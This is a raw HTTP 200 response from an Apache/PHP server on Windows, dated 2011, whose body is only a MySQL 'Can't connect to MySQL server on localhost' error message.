HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:17:23 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Content-Length: 52Content-Type: text/html Can't connect to MySQL server on 'localhost' (10061)